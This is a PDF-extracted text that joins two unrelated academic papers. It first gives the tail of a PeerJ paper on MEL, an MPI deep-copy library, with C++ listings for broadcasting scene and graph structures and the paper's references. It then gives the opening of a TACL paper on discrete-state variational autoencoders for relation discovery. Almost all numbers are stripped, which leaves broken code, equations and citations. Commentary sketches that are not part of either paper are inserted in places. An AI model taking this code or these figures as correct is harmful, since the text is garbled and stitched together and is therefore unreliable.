mpi_char, root, comm); // bcast the vector sizes int sizes[ ]; if (rank == root) { sizes[ ] = (int) scene->mesh.size(); sizes[ ] = (int) scene->materials.size(); } mpi_bcast(sizes, , mpi_int, root, comm); // ′allocate′ space for vectors if (rank != root) { scene->mesh.resize(sizes[ ]); scene->materials.resize(sizes[ ]); } // bcast the vectors mpi_bcast(&(scene->mesh[ ]), sizeof(triangle) * sizes[ ], mpi_char, root, comm); mpi_bcast(&(scene->materials[ ]), sizeof(material) * sizes[ ], mpi_char, root, comm); // receiving nodes allocate space for rootnode if (rank != root) { mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(scene->rootnode)); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. 
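for completeness, the short sketch below shows how the same scene object could be moved point-to-point rather than broadcast. this is our own illustration and is not part of the paper's appendices, which only cover bcast; the helper name exchangescene is hypothetical, and the mel::deep::recv overload for a root pointer is assumed to mirror mel::deep::send (only send, bcast, and the buffered variants are reproduced verbatim in the listings above).

// sketch: deep-copy the scene from rank 0 to rank 1 with blocking
// point-to-point operations (assumed recv overload for a root pointer)
inline void exchangescene(scene *&scene, const mel::comm &comm) {
    const int rank = mel::commrank(comm);
    if (rank == 0) {
        // rank 0 owns the scene and deep-copies it to rank 1 (dst = 1, tag = 0)
        mel::deep::send(scene, 1, 0, comm);
    }
    else if (rank == 1) {
        // rank 1 starts from a null pointer; the deep copy allocates and
        // rebuilds the whole structure via scene::deepcopy / treenode::deepcopy
        mel::deep::recv(scene, 0, 0, comm);
    }
}

the same user-supplied deepcopy methods drive both directions, so no additional code is required beyond what is shown in the scene and treenode listings.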
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ new (scene->rootnode) treenode(); } // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); // bcast the current node's values mpi_bcast((currentnode), sizeof(treenode), mpi_char, root, comm); // do we need to send/receive children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // allocate space for child nodes on receiving process if (rank != root) { mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->leftchild)); mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->rightchild)); new (currentnode->leftchild) treenode(); new (currentnode->rightchild) treenode(); } // push children onto the stack so they get processed treestack.push(currentnode->leftchild); treestack.push(currentnode->rightchild); } } } hand coded buffered bcast of scene object listing hand coded buffered bcast of ray tracing scene object. inline void mpi_bufferedbcast_scene(scene *&scene, const int root, const mpi_comm comm) { int rank; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mpi_comm_rank(comm, &rank); // receiving nodes allocate space for scene if (rank != root) { mpi_alloc_mem(sizeof(scene), mpi_info_null, &scene); new (scene) scene(); } // calculate the byte size of the tree on root process int packed_size = ; if (rank == root) { packed_size += sizeof(camera); packed_size += sizeof(int) + ((int) scene->mesh.size() * sizeof(triangle)); packed_size += sizeof(int) + ((int) scene->materials.size() * sizeof(material)); // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); packed_size += sizeof(treenode); // do we need to send children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // push children onto the stack so they get processed treestack.push(currentnode->leftchild); treestack.push(currentnode->rightchild); } } } // share the buffer size to all processes mpi_bcast(&packed_size, , mpi_int, root, comm); // allocate the buffer int position = ; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ char *buffer; mpi_alloc_mem(packed_size, mpi_info_null, &(buffer)); // if root then we pack the structure into the buffer if (rank == root) { // pack the camera struct mpi_pack(&(scene->camera), sizeof(camera), mpi_char, buffer, packed_size, &position, comm); int mesh_size = scene->mesh.size(), materials_size = scene->materials.size(); // pack the mesh vector mpi_pack(&(mesh_size), , mpi_int, buffer, packed_size, &position, comm); mpi_pack(&(scene->mesh[ ]), mesh_size * sizeof(triangle), mpi_char, buffer, packed_size, &position, comm); // pack the materials vector mpi_pack(&(materials_size), , mpi_int, buffer, packed_size, &position, comm); mpi_pack(&(scene->materials[ ]), materials_size * sizeof(material), mpi_char, buffer, packed_size, &position, comm); // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); // pack the current node mpi_pack(currentnode, sizeof(treenode), mpi_char,buffer,packed_size,&position,comm); // do we need to send children? bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // push children onto the stack so they get processed treestack.push(currentnode->leftchild); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ treestack.push(currentnode->rightchild); } } // send the buffer mpi_bcast(buffer, packed_size, mpi_char, root, comm); } // if not root then we unpack the structure from the buffer else { // receive the packed buffer mpi_bcast(buffer, packed_size, mpi_char, root, comm); mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(scene->rootnode)); new (scene->rootnode) treenode(); // unpack the camera struct int mesh_size, materials_size; mpi_unpack(buffer, packed_size, &position, &(scene->camera), sizeof(camera), mpi_char, comm); // unpack mesh vector mpi_unpack(buffer, packed_size, &position, &(mesh_size), , mpi_int, comm); scene->mesh.resize(mesh_size); mpi_unpack(buffer, packed_size, &position, &(scene->mesh [ ]), mesh_size * sizeof(triangle), mpi_char, comm); // unpack materials vector mpi_unpack(buffer, packed_size, &position, &(materials_size), , mpi_int, comm); scene->materials.resize(materials_size); mpi_unpack(buffer, packed_size, &position, &(scene->materials[ ]), materials_size*sizeof(material),mpi_char,comm); // while the stack is not empty there is work to be done std::stack<treenode*> treestack; treestack.push(scene->rootnode); while (!treestack.empty()) { whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // get the current node to traverse treenode *currentnode = treestack.top(); treestack.pop(); // unpack the current node mpi_unpack(buffer, packed_size, &position, currentnode, sizeof(treenode), mpi_char, comm); // do we need to receive children? 
bool haschildren = (currentnode->leftchild != nullptr); if (haschildren) { // allocate space for child nodes on receiving process mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->leftchild)); mpi_alloc_mem(sizeof(treenode), mpi_info_null, &(currentnode->rightchild)); new (currentnode->leftchild) treenode(); new (currentnode->rightchild) treenode(); // push children onto the stack so they get processed treestack.push(currentnode->leftchild); treestack.push(currentnode->rightchild); } } } // clean up mpi_free_mem(buffer); } experiment : communicating generic directed graph structures listing functions for constructing directed graphs in different shapes. //------------------------------------------------------------// // example usage: // // mpirun -n [num of procs] ./graphcycles [graph nodes: <= n] [graph type: <= t <= ] // // mpirun -n ./graphcycles // //------------------------------------------------------------// int main(int argc, char *argv[]) { mel::init(argc, argv); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel::comm comm = mel::comm::world; const int rank = mel::commrank(comm), size = mel::commsize(comm); if (argc != ) { if (rank == ) std::cout << "wrong number of parameters..." << std::endl; mel::exit(- ); } const int numnodes = << std::stoi(argv[ ]), // ^n nodes graphtype = std::stoi(argv[ ]); digraphnode<int> *graph = nullptr; if (rank == ) { switch (graphtype) { case : graph = makebtreegraph(numnodes); break; case : graph = makeringgraph(numnodes); break; case : graph = makerandomgraph(numnodes); break; case : graph = makefullyconnectedgraph(numnodes); break; } } mel::barrier(comm); auto starttime = mel::wtime(); // start the clock! // deep copy the graph to all nodes mel::deep::bcast(graph, , comm); mel::barrier(comm); auto endtime = mel::wtime(); // stop the clock! if (rank == ) { std::cout << "broadcast graph in " << (endtime - starttime) whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ << " seconds..." << std::endl; } // file name for output std::stringstream sstr; sstr << "rank=" << rank << " type=" << graphtype << " nodes=" << numnodes << ".graph"; // save the output to disk from each node std::ofstream graphfile(sstr.str(), std::ios::out | std::ios::binary); if (graphfile.is_open()) { mel::deep::filewrite(graph, graphfile); graphfile.close(); } destructgraph(graph); mel::finalize(); return ; } factory functions for building directed graphs in different shaped structures listing functions for constructing directed graphs in different shapes. inline digraphnode<int>* makebtreegraph(const int numnodes) { /// btree graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { nodes[i] = mel::memconstruct<digraphnode<int>>(i); } if (numnodes > ) nodes[ ]->edges.push_back(nodes[ ]); for (int i = ; i < numnodes; ++i) { const int j = ((i - ) * ) + ; nodes[i]->edges.reserve( ); if (j < numnodes) nodes[i]->edges.push_back(nodes[j]); if ((j + ) < numnodes) nodes[i]->edges.push_back(nodes [j + ]); } whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ return nodes[ ]; } inline digraphnode<int>* makeringgraph(const int numnodes) { /// ring graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { nodes[i] = mel::memconstruct<digraphnode<int>>(i); } for (int i = ; i < numnodes; ++i) { nodes[i]->edges.reserve( ); nodes[i]->edges.push_back(nodes[(i + ) % numnodes]); nodes[i]->edges.push_back(nodes[(i == ) ? (numnodes - ) : (i - )]); } return nodes[ ]; } inline digraphnode<int>* makerandomgraph(const int numnodes) { srand( ); /// random graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { nodes[i] = mel::memconstruct<digraphnode<int>>(i); } for (int i = ; i < numnodes; ++i) { const int numedges = rand() % numnodes; nodes[i]->edges.reserve(numedges); nodes[i]->edges.push_back(nodes[(i + ) % numnodes]); for (int j = ; j < numedges; ++j) { nodes[i]->edges.push_back(nodes[rand() % numnodes]); } } return nodes[ ]; } inlinedigraphnode<int>*makefullyconnectedgraph(constintnumnodes){ /// fully connected graph std::vector<digraphnode<int>*> nodes(numnodes); for (int i = ; i < numnodes; ++i) { whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nodes[i] = mel::memconstruct<digraphnode<int>>(i); } for (int i = ; i < numnodes; ++i) { nodes[i]->edges.reserve(numnodes); for (int j = ; j < numnodes; ++j) { nodes[i]->edges.push_back(nodes[j]); } } return nodes[ ]; } generic implementation of directed graph container listing generic implementation of directed graph container for deep copy. template<typename t> struct digraphnode { t value; std::vector<digraphnode<t>*> edges; digraphnode() {}; explicit digraphnode(const t &_value) : value(_value) {}; template<typename msg> inline void deepcopy(msg &msg) { msg & edges; for (auto &e : edges) msg.packsharedptr(e); } }; inline void visitgraph(digraphnode<int> *&root, std::function<void(digraphnode<int> *&node)> func) { std::unordered_set<digraphnode<int>*> pointermap; std::stack<digraphnode<int>*> stack; stack.push(root); while (!stack.empty()) { digraphnode<int> *node = stack.top(); stack.pop(); whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // if node has not been visited if (pointermap.find(node) == pointermap.end()) { pointermap.insert(node); for (auto e : node->edges) stack.push(e); func(node); } } } inline void destructgraph(digraphnode<int> *&root) { visitgraph(root, [](digraphnode<int> *&node) -> void { mel::memdestruct(node); }); } additional information and declarations funding joss whittle is funded by an epsrc phd studentship. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: epsrc phd studentship. competing interests the authors declare that they have no competing interests. author contributions � joss whittle conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. � rita borgo conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. � mark w. 
jones conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: source code available at: https://github.com/cs-swansea/mel. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cs-swansea/mel http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references beyer j, oehmke d, sandoval j. . transferring userdefined types in openacc. in: proceedings cray user group (cug’ ). lugano: cray user group. boost-community. . boost c++ libraries. version . . available at http://boost.org (accessed november ). bouteiller a. . fault-tolerant mpi. in: herault t, robert y, eds. fault-tolerance techniques for high-performance computing, chapter . heidelberg, new york, dordrecht, london: springer publishing company, incorporated, – . cogswell j. . adding an easy file save and file load mechanism to your c++ program. informit. available at http://www.boost.org/doc/libs/release/libs/serialization/ (accessed november ). fagg ge, bukovsky a, dongarra jj. . harness and fault tolerant mpi. parallel computing ( ): – doi . /s - ( ) - . fagg ge, dongarra jj. . building and using a fault-tolerant mpi implementation. international journal of high performance computing applications ( ): – doi . / . friedley a, hoefler t, bronevetsky g, lumsdaine a. . ownership passing: efficient distributed memory programming on multi-core systems. in: proceedings of the th acm sigplan symposium on principles and practice of parallel programming, shenzen, china. new york: acm, – . gna. . autoserial library. available at http://home.gna.org/autoserial/mpi.html. goujon ds, michel m, peeters j, devaney je. . automap and autolink tools for communicating complex and dynamic data-structures using mpi. in: panda dk, stunkel cb, eds. network-based parallel computing communication, architecture, and applications canpc ’ . berlin, heidelberg: springer, – . gropp w, lusk e. . fault tolerance in message passing interface programs. international journal of high performance computing applications ( ): – doi . / . grundmann t, ritt m, rosenstiel w. . tpo++: an object-oriented message-passing library in c++. in: proceedings of the international conference on parallel processing. piscataway: ieee, – . herault t, robert y. . fault-tolerance techniques for high-performance computing. first edition. switzerland: springer international publishing, – . hoefler t, snir m. . writing parallel libraries with mpi–common practice. in: proceedings of the th mpi users’ group meeting. vol. . berlin, heidelberg: springer, – . huang c, zheng g, kalé l, kumar s. . performance evaluation of adaptive mpi. in: proceedings of the eleventh acm sigplan symposium on principles and practice of parallel programming, ppopp ’ . new york: acm, – . kale lv, krishnan s. . charm++: a portable concurrent object oriented system based on c++. in: proceedings of the eighth annual conference on object-oriented programming systems, languages, and applications, oopsla ’ . new york: acm, – . laguna i, richards df, gamblin t, schulz m, de supinski br. . evaluating user-level fault tolerance for mpi applications. in: proceedings of the st european mpi users’ group meeting, eurompi/asia ’ . new york: acm, – . lee ea. . the problem with threads. computer ( ): – doi . /mc. . . whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://boost.org http://www.boost.org/doc/libs/release/libs/serialization/ http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://home.gna.org/autoserial/mpi.html http://dx.doi.org/ . / http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee l-q, lumsdaine a. . the generic message passing framework. in: parallel and distributed processing symposium, . proceedings. international. piscataway: ieee. mccandless bc, squyres jm, lumsdaine a. . object oriented mpi (oompi): a class library for the message passing interface. in: mpi developer’s conference, . piscataway: ieee, – . message passing interface forum. . mpi: a message-passing interface standard version . . technical report. stuttgart, de: high performance computing center stuttgart (hlrs). miller p. . productive parallel programming with charm++. in: proceedings of the symposium on high performance computing hpc ’ . san diego: society for computer simulation international, – . renault é. . extended mpicc to generate mpi derived datatypes from c datatypes automatically. in: cappello f, herault t, dongarra j, eds. recent advances in parallel virtual machine and message passing interface: th european pvm/mpi user’s group meeting. berlin, heidelberg: springer, – . tansey w, tilevich e. . efficient automated marshaling of c++ data structures for mpi applications. in: ieee international symposium on parallel and distributed processing, . ipdps . piscataway: ieee, – . vishnu a, dam hv, de jong w, balaji p, song s. . fault-tolerant communication runtime support for data-centric programming models. in: international conference on high performance computing, hipc , dona paula, goa, india, december – , . piscataway: ieee, – . whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementing generalized deep-copy in mpi introduction related work when to use deep copy mel–the mpi extension library mel implementation details benchmarks conclusions and future work appendices references edinburgh research explorer discrete-state variational autoencoders for joint discovery and factorization of relations citation for published version: marcheggiani, d & titov, i , 'discrete-state variational autoencoders for joint discovery and factorization of relations', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. 
https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/discretestate-variational-autoencoders-for-joint-discovery-and-factorization-of-relations( b ff - - b -bf c- ee d ).html discrete-state variational autoencoders for joint discovery and factorization of relations diego marcheggiani illc university of amsterdam marcheggiani@uva.nl ivan titov illc university of amsterdam titov@uva.nl abstract we present a method for unsupervised open- domain relation discovery. in contrast to previous (mostly generative and agglomera- tive clustering) approaches, our model relies on rich contextual features and makes mini- mal independence assumptions. the model is composed of two parts: a feature-rich re- lation extractor, which predicts a semantic relation between two entities, and a factor- ization model, which reconstructs arguments (i.e., the entities) relying on the predicted re- lation. the two components are estimated jointly so as to minimize errors in recovering arguments. we study factorization models in- spired by previous work in relation factoriza- tion and selectional preference modeling. our models substantially outperform the genera- tive and agglomerative-clustering counterparts and achieve state-of-the-art performance. introduction the task of relation extraction (re) consists of de- tecting and classifying the semantic relations present in text. re has been shown to benefit a wide range of nlp tasks, such as information retrieval (liu et al., ), question answering (ravichandran and hovy, ) and textual entailment (szpektor et al., ). supervised methods for re have been success- ful when small restricted sets of relations are con- sidered. however, human annotation is expensive and time-consuming, and consequently these ap- proaches do not scale well to the open-domain set- ting where a large number of relations need to be detected in a heterogeneous text collection (e.g., the entire web). though weakly-supervised ap- proaches, such as distantly supervised methods and bootstrapping (mintz et al., ; agichtein and gravano, ), reduce the amount of necessary su- pervision, they still require examples for every rela- tion considered. these limitations led to the emergence of unsu- pervised approaches for re. these methods extract surface or syntactic patterns between two entities and either directly use these patterns as substitutes for semantic relations (banko et al., ; banko and etzioni, ) or cluster the patterns (sometimes in context-sensitive way) to form relations (lin and pantel, ; yao et al., ; nakashole et al., ; yao et al., ). the existing methods, given their generative (or agglomerative clustering) nature, rely on simpler features than their supervised coun- terparts and also make strong modeling assumptions (e.g., assuming that arguments are conditionally in- dependent of each other given the relation). these shortcomings are likely to harm their performance. in this work, we tackle the aforementioned chal- lenges and introduce a new model for unsupervised relation extraction. we also describe an efficient es- timation algorithm which lets us experiment with large unannotated collections. our model is com- posed of two components: • an encoding component: a feature-rich relation extractor which predicts a semantic relation be- tween two entities in a specific sentence given contextual features; • a reconstruction component: a factorization model which reconstructs arguments (i.e., the entities) relying on the predicted relation. 
the two components are estimated jointly so as to minimize errors in reconstructing arguments. while transactions of the association for computational linguistics, vol. , pp. – , . action editor: sebastian riedel. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. learning to predict left-out arguments, the inference algorithm will search for latent relations that sim- plify the argument prediction task as much as possi- ble. roughly, such an objective will favour inducing relations that maximally constrain the set of admis- sible argument pairs. our hypothesis is that relations induced in this way will be interpretable by humans and useful in practical applications. why is this hy- pothesis plausible? primarily because humans typi- cally define relations as an abstraction capturing the essence of the underlying situation. and the under- lying situation (rather than surface linguistic details like syntactic functions) is precisely what imposes constraints on admissible argument pairs. this framework allows us to both exploit rich fea- tures (in the encoding component) and capture inter- dependencies between arguments in a flexible way (both in the reconstruction and encoding compo- nents). the use of a reconstruction-error objective, pre- viously considered primarily in the context of train- ing neural autoencoders (hinton, ; vincent et al., ), gives us an opportunity to borrow ideas from the well-established area of statistical rela- tional learning (getoor and taskar, ), and, more specifically, relation factorization. in this area, tensor and matrix factorization methods have been shown to be effective for inferring missing facts in knowledge bases (bordes et al., ; riedel et al., ; chang et al., ; bordes et al., ; sutskever et al., ). in our work, we also adopt a fairly standard rescal factorization (nickel et al., ) and use it within our reconstruction compo- nent. though there is a clear analogy between statisti- cal relational learning and our setting, there is also a very significant difference. in contrast to rela- tional learning, rather than factorizing existing re- lations (an existing ‘database’), our method simulta- neously discovers the relational schema (i.e., an in- ventory of relations) and a mapping from text to the relations (i.e., a relation extractor), and it does it in such a way as to maximize performance on recon- struction (i.e., inference) tasks. this analogy also highlights one important property of our framework: unlike generative models, we explicitly force our se- mantic representations to be useful for at least the most basic form of semantic inference (i.e., infer- ring an argument based on the relation and another argument). it is important to note that the model is completely agnostic about the real semantic relation between two arguments, as the relational schema is discovered during learning. we consider both a factorization method inspired by previous research in knowledge base modeling (as discussed above) and another, even simpler one, based on ideas from previous research on model- ing selectional preferences (e.g., resnik ( ); ó séaghdha ( ); van de cruys ( )), plus their combination. our models are applied to a version of the new york times corpus (sandhaus, ). in order to evaluate our approach, we follow yao et al. ( ) and align named entities in our collection to freebase (bollacker et al., ), a large collabo- rative knowledge base. 
in this way we can evaluate a subset of our induced relations against relations in freebase. note that freebase has not been used dur- ing learning, making this a fair evaluation scenario for an unsupervised relation induction method. we also qualitatively evaluate our model by both con- sidering several examples of induced relations (both appearing and not appearing in freebase) and vi- sualizing embeddings of named entities induced by our model. as expected, the choice of a factoriza- tion model affects the model performance. our best models substantially outperform the state-of-the-art generative rel-lda model of yao et al. ( ): . % f and . % f for our best model and rel- lda, respectively. the rest of the paper is structured as follows. in the following section, we formally describe the problem. in section , we motivate our approach. in section , we formally describe the method. in section we describe our experimental setting and discuss the results. we give more background on re, knowledge base completion and autoencoders in section . problem definition in the most standard form of re considered in this work, an extractor, given a sentence and a pair of named entities e and e , needs to predict the under- lying semantic relation r between these entities. for example, in the sentence roger ebert wrote a review of the fall feature representation of “ebert is the first ….” ( ) relation extractor ( = encoding) awarded(e : ebert, e : pulitzer prize) entity prediction ( = reconstruction) hidden log-linear feature-rich model factorization model x pulitzer prize figure : inducing relations with discrete-state autoencoders. we have two entities e = roger ebert and e = the fall, and the extractor should predict the semantic relation r = reviewed. the stan- dard approach to this task is to either rely on hu- man annotated data (i.e., supervised learning) or use data generated automatically by aligning knowledge bases (e.g., freebase) with text (called distantly- supervised methods). both classes of approaches as- sume a predefined inventory of relations and a man- ually constructed resource. in contrast, the focus of this paper is on open- domain unsupervised re (also known as relation discovery) where no fixed inventory of relations is provided to the learner. the methods induce rela- tions from the data itself. previous work on this task (banko et al., ), as well as on its general- ization, called unsupervised semantic parsing (poon and domingos, ; titov and klementiev, ), groups patterns between entity pairs (e.g., wrote a review, wrote a critique and reviewed) and uses these clusters as relations. other approaches (e.g., shinyama and sekine ( ); yao et al. ( ); yao et al. ( ); de lacalle and lapata ( )), in- cluding the one introduced in this paper, perform context-sensitive clustering, that is, they treat rela- tions as latent variables and induce them for each entity-pair occurrence individually. rather than re- lying solely on a pattern between entity pairs, the latter class of methods can use additional context to decide that napoleon reviewed the old guard and the above sentence about roger ebert should not be labeled with the same relation. in some of our examples we will use relation names, al- though our method, as virtually any other latent variable model, will not induce names but only indices. 
unsupervised relation discovery is an important task because existing knowledge bases (e.g., free- base, yago (suchanek et al., ), dbpedia (auer et al., )) do not have perfect coverage even for most standard domains (e.g., music or sports), and, arguably more importantly, because there are many domains not covered by these resources. though one option is to provide a list of relations with seed examples for each of them and then use bootstrap- ping (agichtein and gravano, ), it requires do- main knowledge and may thus be problematic. in these cases unsupervised relation discovery is the only non-labour-intensive way to construct a rela- tion extractor. moreover, unsupervised methods can also aid in building new knowledge bases by pro- viding an initial set of relations which can then be refined. as is common, in this work we limit ourselves to only considering binary relations between entities occurring in the same sentence. we focus only on extracting semantic relations, assuming that named entities have already been recognized by an exter- nal method (finkel et al., ). as in previous work (yao et al., ), we are not trying to detect if there is a relation between two entities or not; our aim is to detect a relation between each pair of enti- ties appearing in a sentence. in principle, heuristics (i.e., based on the syntactic dependency paths con- necting arguments) can be used to get rid of unlikely pairs. our approach we approach the problem by introducing a latent variable model which defines the interactions be- tween a latent relation r and the observables: the entity pair (e ,e ) and other features of the sentence x. the idea which underlies much of latent vari- able modeling is that a good latent representation is the one that helps us to reconstruct the input (i.e., x, including (e ,e )). in practice, we are not inter- ested in predicting x, as x is observable, but rather in inducing an appropriate latent representation (i.e., r). thus, it is crucial to design the model in such a way that a good r (the one predictive of x) indeed encodes relations rather than some other form of ab- straction. in our approach, we encode this reconstruction idea very explicitly. as a motivating example, con- sider the following sentence: ebert is the first journalist to win the pulitzer prize. as shown in figure , let us assume that we hide one argument, chosen at random: for example, e = pulitzer prize. now the purpose of the re- construction component is to reconstruct (i.e., infer) this argument relying on another argument (e = ebert), the latent relations r and nothing else. at learning time, our inference algorithm will search through the space of potential relation clusterings to find the one that makes these reconstruction tasks as simple as possible. for example, if the algorithm clusters expressions is the first journalist to win to- gether with was awarded, the prediction is likely to be successful, assuming that the passage ebert was awarded the pulitzer prize has been observed else- where in the training data. on the contrary, if the algorithm clustered is the first journalist to win with presented, we are likely to make a wrong inference (i.e., predict golden thumb award). given that we optimize the reconstruction objective, the former clustering is much more likely than the latter. re- construction can be seen as a knowledge base fac- torization approach similar to the ones of bordes et al. ( ). 
notice that the model's final goal is to learn a good relation clustering, and that the reconstruction objective is used as a means to reach this goal. for reasons which will be clear in a moment, we will refer to the model performing the prediction of entities relying on other entities and relations as a decoder (a.k.a. the reconstruction component). despite our description of the model as pattern-clustering, it is important to stress that we are inducing clusters in a context-sensitive way. in other words, we are learning an encoder: a feature-rich classifier, which predicts a relation for a specific sentence and an entity pair in this sentence. clearly, this is a better approach because some of the patterns between entities are ambiguous and require extra features to disambiguate them (recall the example from the previous section), whereas other patterns may not be frequent enough to induce reliable clustering (e.g., is the first journalist to win). the encoding and reconstruction components are learned jointly so as to minimize the prediction error. in this way, the encoder is specialized to the defined reconstruction problem.

reconstruction error minimization

in order to implement the desiderata sketched in the previous section, we take inspiration from a framework popular in the neural network community, namely autoencoders (hinton, ). autoencoders are composed of two components: an encoder which predicts a latent representation y from an input x, and a decoder which relies on the latent representation y to recover the input (x̃). in the learning phase, the parameters of both the encoding and reconstruction part are chosen so as to minimize a reconstruction error (e.g., the squared euclidean distance ||x - x̃||^2). although popular within the neural network community (where y is defined as a real-valued vector), autoencoders have recently been applied to the discrete-state setting (where y is defined as a categorical random variable, a tuple of variables or a graph). for example, such models have been used in the context of dependency parsing (daumé iii, ), or in the context of pos tagging and word alignment (ammar et al., ; lin et al., a). the most related previous work (titov and khoddam, ) considers induction of semantic roles of verbal arguments (e.g., an agent, a performer of an action vs. a patient, an affected entity), though no grouping of predicates into relations was considered. we refer to such models as discrete-state autoencoders. we use different model families for the encoding and reconstruction components. the encoding part is a log-linear feature-rich model, while the reconstruction part is a tensor (or matrix) factorization model which seeks to reconstruct entities, relying on the outcome of the encoding component.

encoding component

the encoding component, that is, the actual relation extractor that will be used to process new sentences, is a feature-rich classifier that, given a set of features extracted from the sentence, predicts the corresponding semantic relation r ∈ R. we use a log-linear model ('softmax regression')

q(r | x, w) = exp(w^T g(r, x)) / ∑_{r' ∈ R} exp(w^T g(r', x)),   ( )

where g(r, x) is a high-dimensional feature representation and w is the corresponding vector of parameters. in principle, the encoding model can be any model as long as the relation posteriors q(r | x, w) and their gradients can be efficiently computed or approximated. we discuss the features we use in the experimental section (section ).
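to make the encoding component concrete, here is a minimal numpy sketch of how the relation posteriors q(r | x, w) could be computed; it is an illustration only (the binary-feature indexing scheme, the number of relations and the toy dimensions are assumptions, not the authors' released implementation):

```python
import numpy as np

def relation_posteriors(active_features, W):
    """q(r | x, w) for a log-linear ('softmax regression') encoder.

    active_features: indices of the binary features extracted from the sentence,
                     so w^T g(r, x) reduces to summing one weight per feature for each r.
    W:               weight matrix of shape (num_relations, num_features).
    """
    scores = W[:, active_features].sum(axis=1)   # unnormalised score for every relation r
    scores -= scores.max()                       # numerical stability
    exp_scores = np.exp(scores)
    return exp_scores / exp_scores.sum()         # normalise over the relation inventory R

# toy usage: 40 induced relations over 100,000 hashed features
rng = np.random.default_rng(0)
W = rng.normal(scale=0.01, size=(40, 100_000))
q = relation_posteriors([17, 4242, 90_001], W)
print(q.shape, round(q.sum(), 6))                # (40,) 1.0
```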
reconstruction component

in the reconstruction component (i.e., decoder), we seek to predict an entity e_i ∈ E in a specific position i ∈ {1, 2} given the relation r and another entity e_{-i}, where e_{-i} denotes the complement {e_1, e_2} \ {e_i}. note that this model does not have access to any features of the sentence; this is crucial since in this way we ensure that all the essential information is encoded by the relation variable. this bottleneck forces the learning algorithm to induce informative relations rather than cluster relation occurrences in a random fashion or assign them all to the same relation. to simplify our notation, let us assume that we predict e_1; the model for e_2 will be analogous. we write the conditional probability models in the following form

p(e_1 | e_2, r, θ) = exp(ψ(e_1, e_2, r, θ)) / ∑_{e' ∈ E} exp(ψ(e', e_2, r, θ)),   ( )

where E is the set of all entities; ψ is a general scoring function which, as we will show, can be instantiated in several ways; θ represents its parameters. the actual set of parameters represented by θ will depend on the choice of scoring function. however, in all the cases we consider in this paper, the parameters will include entity embeddings (u_e ∈ R^d for every e ∈ E). these embeddings will be learned within our model. in this work we explore three different factorizations ψ for the decoding component: a tensor factorization model inspired by previous work on relation factorization, a simple selectional-preference model which scores each argument independently of the other, and a third model which is a combination of the first two.

ψ_RS: rescal

